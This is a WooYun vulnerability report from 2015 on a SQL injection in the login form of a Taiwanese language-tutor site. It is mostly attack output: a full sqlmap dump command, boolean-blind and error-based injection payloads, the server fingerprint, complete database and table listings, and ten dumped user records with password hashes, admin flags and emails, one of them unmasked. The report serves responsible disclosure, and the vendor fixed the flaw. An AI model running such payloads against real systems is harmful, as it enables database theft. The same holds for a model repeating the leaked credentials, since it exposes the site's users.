当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156678

漏洞标题:語港網某站點存在SQL註射漏洞(1W多名用户密码,邮箱等信息泄露)(臺灣地區)

相关厂商:語港網

漏洞作者: 路人甲

提交时间:2015-11-29 20:17

修复时间:2016-01-07 16:23

公开时间:2016-01-07 16:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-29: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

在我們的網站您可以找到所有英文老師,西班牙文老師,法文老師,德文老師,義大利文老師,日文老師,韓文老師,中文老師,台語老師甚至其他語言的外籍家教和外籍老師喔!

详细说明:

地址:http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2

$ python sqlmap.py -u "http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2" -p username --technique=BE --form --random-agent --batch  -Dmyucomtw -T prod_user -C user_id,password,is_admin,hash,email --dump --start 1--stop 10


Database: myucomtw
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| prod_user | 10081   |
+-----------+---------+


Database: myucomtw
Table: prod_user
[10 entries]
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+
| user_id | password                                                     | is_admin | hash                             | email                      |
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+
| 2       | $2a$10$eec4ce34b8b6a45374b23uWQ09GJ18lO0eLycjR9A7YKFCA1t.xIm | 1        | e06430fc1369df72ba1f43ddca517e08 | rytrasmi@yahoo.ca          |
| 6       | $2a$10$785851c266ce621696044uFF.hHWu.s8Ai/OacX/yjlj7IiMtpyeS | 1        | 8b338ef10e0456049979f1ddde454058 | at.macmillan@**.**.**.**     |
| 24      | $2a$10$39bb96e33bff0400d76adezVYOdFgAh0gQtbgcV0R6kJklMFg/yfy | 0        | ffc06bad291e64eed00f76882e3d431f | michaelstor@**.**.**.**      |
| 116     | $2a$10$9b7581221160eb51127baOQeAMdab/n.t42HtNZN1cROQOIVEnYou | 0        | 4816fe2eb93aa7ac54228ca4baf3b99f | jtwmountain@**.**.**.**      |
| 162     | $2a$10$c07c950bd436559cd492bOK36nmV93ITRFh2VNZ1uZrKc/o.YmPN6 | 0        | 77c62e959e6dba6b0140ca14cdc9a510 | jimmychiu@**.**.**.** |
| 197     | $2a$10$a63e894f740db680d373cuHnPs0k9ThfAEfhQoVHAc0ery/O3R9H. | 0        | 8b05cf61013c60f87f302d79fe7da84b | anavlados@**.**.**.**        |
| 236     | $2a$10$570ffb9b04f03b5be229fOeiqsagcIjnCttq/h7/GGU3WNr5U1bky | 0        | 4b6a871c9a21c1aa4e77f2a6b93bd3d4 | b.c.frattini@**.**.**.**     |
| 256     | $2a$10$70179178278331426b3d5uvUB0jHvfYIg4/C2QyXj0jr5D5WKLRje | 0        | b298518de3c00e3c57cc16d1bdb3e253 | uwrobert@**.**.**.**         |
| 275     | $2a$10$a1dd36ba819c0dc56aab1uZ.YH3MYvnWl7fdcJxAMdH42z8G7ag0K | 0        | a54e1c15d1f45061b81035f000202637 | henryyu@**.**.**.**      |
| 281     | $2a$10$50d8c048c4609635d143auDJeTOpHky1Vbz4W3Eb.oQMw1tzlco8. | 0        | 8468af44c2d95b33f91fd2f9999a2a94 | victorbrown5800@**.**.**.**  |
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+

漏洞证明:

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
---
web server operating system: FreeBSD
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
current user:    '**.**.**.**@localhost'
current user is DBA:    False
database management system users [1]:
[*] '**.**.**.**'@'localhost'
Database: myucomtw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| prod_userfrom                         | 32981   |
| prod_session                          | 20681   |
| prod_viewed_ad                        | 12802   |
| prod_teacher_feedback                 | 10502   |
| prod_user                             | 10081   |
| prod_teacher_shortlist                | 9850    |
| prod_teacher_location                 | 8688    |
| prod_rss_teachers                     | 7730    |
| prod_student                          | 7553    |
| prod_points_purchase                  | 5638    |
| prod_teacher_deactivations            | 5458    |
| prod_teacher_language                 | 3876    |
| prod_subscriptions_tracking           | 2731    |
| prod_teacher                          | 2662    |
| prod_teacher_emails_to_invite         | 1531    |
| prod_ad                               | 963     |
| test_session                          | 790     |
| prod_ips                              | 699     |
| prod_spam_bots                        | 400     |
| prod_districts                        | 370     |
| test_districts                        | 370     |
| test_userfrom                         | 224     |
| test_points_purchase                  | 219     |
| prod_failed_logins                    | 130     |
| prod_daily_word                       | 128     |
| prod_partner_stats                    | 63      |
| prod_partners                         | 51      |
| prod_business_card                    | 49      |
| test_teacher_location                 | 47      |
| test_teacher_language                 | 41      |
| test_rss_teachers                     | 31      |
| prod_pricelist                        | 30      |
| test_pricelist                        | 30      |
| prod_landing_pages                    | 24      |
| prod_forums_access                    | 19      |
| prod_country                          | 17      |
| test_country                          | 17      |
| test_partner_stats                    | 17      |
| prod_rss_items                        | 15      |
| test_rss_items                        | 15      |
| test_ad                               | 8       |
| test_teacher_feedback                 | 8       |
| prod_offsite_ads                      | 7       |
| test_daily_word                       | 6       |
| test_partners                         | 6       |
| prod_blacklisted_email                | 5       |
| prod_subscriptions                    | 5       |
| test_viewed_ad                        | 5       |
| test_offsite_ads                      | 4       |
| test_teacher_shortlist                | 4       |
| test_business_card                    | 2       |
| test_subscriptions                    | 2       |
| test_subscriptions_tracking           | 2       |
| test_blacklisted_email                | 1       |
| test_ips                              | 1       |
| test_landing_pages                    | 1       |
| test_student                          | 1       |
| test_teacher_emails_to_invite         | 1       |
| test_user                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 2253    |
| STATISTICS                            | 501     |
| SESSION_VARIABLES                     | 444     |
| GLOBAL_VARIABLES                      | 430     |
| GLOBAL_STATUS                         | 341     |
| SESSION_STATUS                        | 341     |
| PARTITIONS                            | 252     |
| TABLES                                | 252     |
| KEY_COLUMN_USAGE                      | 233     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| TABLE_CONSTRAINTS                     | 190     |
| PLUGINS                               | 42      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| SCHEMA_PRIVILEGES                     | 32      |
| ENGINES                               | 9       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: myucomtw_forums
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| yphpads_adstats                       | 587104  |
| yphpads_userlog                       | 72232   |
| vb_phrase                             | 15653   |
| vb_post                               | 7619    |
| vb_thread                             | 7374    |
| vb_rsslog                             | 7295    |
| vb_cronlog                            | 7180    |
| vb_adminlog                           | 4015    |
| yphpads_targetstats                   | 2896    |
| vb_stats                              | 2586    |
| vb_threadviews                        | 2108    |
| vb_adminhelp                          | 1394    |
| vb_sigparsed                          | 682     |
| vb_template                           | 415     |
| vb_setting                            | 309     |
| vb_moderatorlog                       | 153     |
| vb_avatar                             | 108     |
| vb_phrasetype                         | 59      |
| vb_settinggroup                       | 40      |
| vb_editlog                            | 37      |
| vb_faq                                | 30      |
| vb_forumpermission                    | 27      |
| vb_datastore                          | 25      |
| yphpads_banners                       | 20      |
| yphpads_zones                         | 18      |
| vb_cron                               | 17      |
| vb_reputationlevel                    | 15      |
| yphpads_cache                         | 15      |
| yphpads_clients                       | 15      |
| vb_icon                               | 14      |
| vb_attachmenttype                     | 11      |
| vb_smilie                             | 11      |
| vb_usergroup                          | 11      |
| vb_pm                                 | 10      |
| vb_paymentinfo                        | 9       |
| vb_announcementread                   | 8       |
| vb_session                            | 8       |
| vb_paymentapi                         | 7       |
| vb_subscriptionlog                    | 7       |
| vb_attachment                         | 6       |
| vb_mh_fl_forum_language               | 6       |
| vb_forum                              | 5       |
| vb_pmtext                             | 5       |
| vb_postparsed                         | 5       |
| vb_announcement                       | 4       |
| vb_imagecategory                      | 4       |
| vb_infractionlevel                    | 4       |
| vb_externalcache                      | 3       |
| vb_style                              | 3       |
| vb_user                               | 3       |
| vb_userfield                          | 3       |
| vb_usertextfield                      | 3       |
| vb_usertitle                          | 3       |
| vb_administrator                      | 2       |
| vb_deletionlog                        | 2       |
| vb_language                           | 2       |
| vb_plugin                             | 2       |
| vb_pollvote                           | 2       |
| vb_productcode                        | 2       |
| vb_profilefield                       | 2       |
| vb_rssfeed                            | 2       |
| vb_adminutil                          | 1       |
| vb_calendar                           | 1       |
| vb_moderator                          | 1       |
| vb_passwordhistory                    | 1       |
| vb_paymenttransaction                 | 1       |
| vb_poll                               | 1       |
| vb_product                            | 1       |
| vb_regimage                           | 1       |
| vb_reputation                         | 1       |
| vb_strikes                            | 1       |
| vb_subscription                       | 1       |
| vb_usergroupleader                    | 1       |
| vb_usergrouprequest                   | 1       |
| yphpads_affiliates                    | 1       |
| yphpads_config                        | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: myucomtw
Table: prod_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: myucomtw
Table: test_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: myucomtw_forums
Table: yphpads_affiliates
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(64) |
+----------+-------------+
Database: myucomtw_forums
Table: vb_forum
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: myucomtw_forums
Table: vb_usergroup
[2 columns]
+-----------------+----------------------+
| Column          | Type                 |
+-----------------+----------------------+
| passwordexpires | smallint(5) unsigned |
| passwordhistory | smallint(5) unsigned |
+-----------------+----------------------+
Database: myucomtw_forums
Table: yphpads_clients
[1 column]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| clientpassword | varchar(64) |
+----------------+-------------+
Database: myucomtw_forums
Table: vb_session
[1 column]
+--------+------------+
| Column | Type       |
+--------+------------+
| bypass | tinyint(4) |
+--------+------------+
Database: myucomtw_forums
Table: vb_user
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| passworddate | date        |
+--------------+-------------+
Database: myucomtw_forums
Table: vb_passwordhistory
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(50) |
| passworddate | date        |
+--------------+-------------+


---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
---
web server operating system: FreeBSD
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
Database: myucomtw
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| prod_user | 10081   |
+-----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
---
web server operating system: FreeBSD
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
Database: myucomtw
Table: prod_user
[11 columns]
+--------------------------+--------------+
| Column                   | Type         |
+--------------------------+--------------+
| banned                   | tinyint(1)   |
| email                    | varchar(255) |
| hash                     | varchar(255) |
| is_admin                 | tinyint(1)   |
| is_outside_admin         | tinyint(1)   |
| is_valid                 | tinyint(1)   |
| last_login_date          | datetime     |
| password                 | varchar(255) |
| registered_date          | datetime     |
| sent_expire_warning_date | datetime     |
| user_id                  | int(11)      |
+--------------------------+--------------+


Database: myucomtw
Table: prod_user
[10 entries]
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+
| user_id | password                                                     | is_admin | hash                             | email                      |
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+
| 2       | $2a$10$eec4ce34b8b6a45374b23uWQ09GJ18lO0eLycjR9A7YKFCA1t.xIm | 1        | e06430fc1369df72ba1f43ddca517e08 | rytrasmi@yahoo.ca          |
| 6       | $2a$10$785851c266ce621696044uFF.hHWu.s8Ai/OacX/yjlj7IiMtpyeS | 1        | 8b338ef10e0456049979f1ddde454058 | at.macmillan@**.**.**.**     |
| 24      | $2a$10$39bb96e33bff0400d76adezVYOdFgAh0gQtbgcV0R6kJklMFg/yfy | 0        | ffc06bad291e64eed00f76882e3d431f | michaelstor@**.**.**.**      |
| 116     | $2a$10$9b7581221160eb51127baOQeAMdab/n.t42HtNZN1cROQOIVEnYou | 0        | 4816fe2eb93aa7ac54228ca4baf3b99f | jtwmountain@**.**.**.**      |
| 162     | $2a$10$c07c950bd436559cd492bOK36nmV93ITRFh2VNZ1uZrKc/o.YmPN6 | 0        | 77c62e959e6dba6b0140ca14cdc9a510 | jimmychiu@**.**.**.** |
| 197     | $2a$10$a63e894f740db680d373cuHnPs0k9ThfAEfhQoVHAc0ery/O3R9H. | 0        | 8b05cf61013c60f87f302d79fe7da84b | anavlados@**.**.**.**        |
| 236     | $2a$10$570ffb9b04f03b5be229fOeiqsagcIjnCttq/h7/GGU3WNr5U1bky | 0        | 4b6a871c9a21c1aa4e77f2a6b93bd3d4 | b.c.frattini@**.**.**.**     |
| 256     | $2a$10$70179178278331426b3d5uvUB0jHvfYIg4/C2QyXj0jr5D5WKLRje | 0        | b298518de3c00e3c57cc16d1bdb3e253 | uwrobert@**.**.**.**         |
| 275     | $2a$10$a1dd36ba819c0dc56aab1uZ.YH3MYvnWl7fdcJxAMdH42z8G7ag0K | 0        | a54e1c15d1f45061b81035f000202637 | henryyu@**.**.**.**      |
| 281     | $2a$10$50d8c048c4609635d143auDJeTOpHky1Vbz4W3Eb.oQMw1tzlco8. | 0        | 8468af44c2d95b33f91fd2f9999a2a94 | victorbrown5800@**.**.**.**  |
+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-30 16:56

厂商回复:

感謝通報

最新状态:

2016-01-07:已修復

漏洞评价:

评价